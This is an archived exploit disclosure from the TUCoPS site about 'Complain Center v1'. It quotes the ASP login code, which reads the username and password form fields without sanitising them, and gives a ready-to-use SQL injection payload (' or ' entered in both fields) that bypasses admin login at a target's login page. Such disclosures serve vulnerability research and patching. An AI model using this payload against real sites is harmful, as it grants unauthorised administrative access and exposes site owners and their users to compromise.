TUCoPS :: HP Unsorted C :: b06-4738.htm

Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection


ENGLISH

# Title  :   Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

[CODE]

loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...

//Before join login page
http://[target]/[path]/login.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH